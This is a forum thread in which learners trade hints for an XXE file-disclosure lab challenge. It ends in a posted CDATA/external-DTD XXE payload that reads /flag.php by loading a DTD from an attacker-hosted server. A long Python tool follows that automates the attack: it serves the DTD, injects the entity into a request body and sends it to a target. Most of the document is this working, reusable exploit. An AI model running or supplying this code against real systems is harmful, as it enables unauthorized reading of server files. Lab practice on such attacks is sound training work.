Web Attacks - Advanced File Disclosure

Could someone please give me a tip to help complete the challenge at the end of the Advanced File Disclosure section?

I’ve tried both methods to try and find flag.php. When I use either method I can get the other PHP pages to show up fine, I can view system files, but for some reason I can’t find the flag. This makes me believe it might be contained in a subdirectory that I don’t know the name of. I’ve already tried fuzzing for different directories but this still isn’t helping.

Any help would be appreciated.

Hi @Theonly_wilko,
I am not even able to view the system files in the response.
In my local DTD file, I kept it as echo '' > xxe.dtd
Also, in my request I append the piece of code given in the module, changing only the IP and port.
Can you tell me whether I should append anything in the local DTD file, as the hint says: "Don't forget to point the 'file' to the flag in your local DTD file."


Hey guys!!! I've finally solved it!!! DM me if you need any help.


Sorry I didn’t see this. I’m glad you got it in the end!

Hi bhatty, how are you doing? Could you please drop a hint on this? Thanks in advance!

Hello,

I do not understand why it is not working like in the course. Even the first thing is not working.

EDIT: I FOUND THE ERROR.
I needed to change the content too, not keep the original content.


Hello Everyone, I am also stuck at this point

Can anyone help please ??

Thank You

-justincase

So, for everyone struggling here, here is what you might want to do.

Basic

  1. Make sure you include the reference entity inside the <email> * </email> tags. For instance: <email>&company;</email>
  2. Don't forget the ; after the reference entity.

Advanced – CDATA

  1. Set a payload on your machine:
echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
python3 -m http.server 8000

  2. Exploit: Add this on top of the POST request in Burp Suite:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
  <!ENTITY % begin "<![CDATA["> 
  <!ENTITY % file SYSTEM "file:///flag.php"> 
  <!ENTITY % end "]]>"> 
  <!ENTITY % xxe SYSTEM "http://10.10.15.214:8000/xxe.dtd">
  %xxe;
]>
...........
<email>&joined;</email>
...........

As you can tell, no secrets told. Everything here is given in the module and is taken directly from it. Though, the error-based XXE doesn't seem to work for me at all.
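To tie the two steps of the CDATA method above together (host the xxe.dtd, build the DOCTYPE, and swap the original <email> value for &joined;, which is the mistake several people in this thread hit), here is a small stdlib-only helper. It is an added example, not code from the original post or from the HTB module. The attacker address 10.10.15.214:8000, the target address and the /submit.php endpoint are placeholders you must replace; the listener also records which client fetched the DTD, so a missing hit tells you the target never parsed your DOCTYPE before you start hunting for the flag.

```python
"""CDATA / external-DTD XXE helper (added example, not the module's code).

Assumptions (replace with your own values): attacker VPN IP 10.10.15.214,
listener port 8000, target file /flag.php, target endpoint /submit.php.
"""
import http.client
import re
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

DTD_NAME = "xxe.dtd"

# Matches the optional XML declaration so we never emit it twice.
XML_DECL_RE = re.compile(r"^\s*<\?xml[^>]*\?>\s*")
# Matches the <email> element whose value the server reflects back.
EMAIL_RE = re.compile(r"<email>.*?</email>", re.S)


def dtd_text() -> str:
    """Same content as: echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd

    %begin;, %file; and %end; are parameter entities defined in the request's
    DOCTYPE; this external DTD joins them into one general entity so the raw
    PHP source ends up wrapped in <![CDATA[ ... ]]> and survives parsing.
    """
    return '<!ENTITY joined "%begin;%file;%end;">\n'


class _DTDHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path != "/" + DTD_NAME:
            self.send_error(404)
            return
        body = dtd_text().encode()
        self.server.hits.append(self.client_address[0])  # who fetched the DTD
        self.send_response(200)
        self.send_header("Content-Type", "application/xml-dtd")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, fmt, *args):  # keep stderr quiet; hits[] is the record
        pass


def serve_dtd(bind="0.0.0.0", port=8000):
    """Start the equivalent of `python3 -m http.server` in a background thread.

    Returns the server; server.hits lists the IPs that requested xxe.dtd and
    server.server_address[1] is the bound port (useful when port=0).
    """
    server = ThreadingHTTPServer((bind, port), _DTDHandler)
    server.hits = []
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def build_payload(attacker_host, attacker_port, target_file, body_xml):
    """Prepend the DOCTYPE from the post and point <email> at &joined;."""
    if not EMAIL_RE.search(body_xml):
        raise ValueError("request body has no <email> element to inject into")
    body = XML_DECL_RE.sub("", body_xml)
    # The original value must go: the entity reference has to be the content.
    body = EMAIL_RE.sub("<email>&joined;</email>", body, count=1)
    doctype = (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE email [\n"  # non-validating parsers ignore the root-name mismatch
        '  <!ENTITY % begin "<![CDATA[">\n'
        f'  <!ENTITY % file SYSTEM "file://{target_file}">\n'
        '  <!ENTITY % end "]]>">\n'
        f'  <!ENTITY % xxe SYSTEM "http://{attacker_host}:{attacker_port}/{DTD_NAME}">\n'
        "  %xxe;\n"
        "]>\n"
    )
    return doctype + body


def http_request(host, port, method, path, body=None, content_type=None):
    """Minimal HTTP client; returns (status, decoded body)."""
    headers = {"Content-Type": content_type} if content_type else {}
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request(method, path, body=body, headers=headers)
    resp = conn.getresponse()
    data = resp.read().decode(errors="replace")
    conn.close()
    return resp.status, data


def send_payload(target_host, target_port, path, payload):
    return http_request(target_host, target_port, "POST", path,
                        body=payload.encode(), content_type="application/xml")


if __name__ == "__main__":
    # Placeholder target; the body mirrors the form the module's page submits.
    server = serve_dtd(port=8000)
    payload = build_payload("10.10.15.214", 8000, "/flag.php",
                            "<root><name>test</name><email>test@test.com</email></root>")
    status, html = send_payload("TARGET_IP", 80, "/submit.php", payload)
    print(status, html)
    print("DTD fetched by:", server.hits)  # empty list => DOCTYPE never parsed
```

If the listener shows no hit but the basic (internal entity) method worked, check that the request still carries the full DOCTYPE and that nothing in the body contains a literal "]]>", which would terminate the CDATA section early.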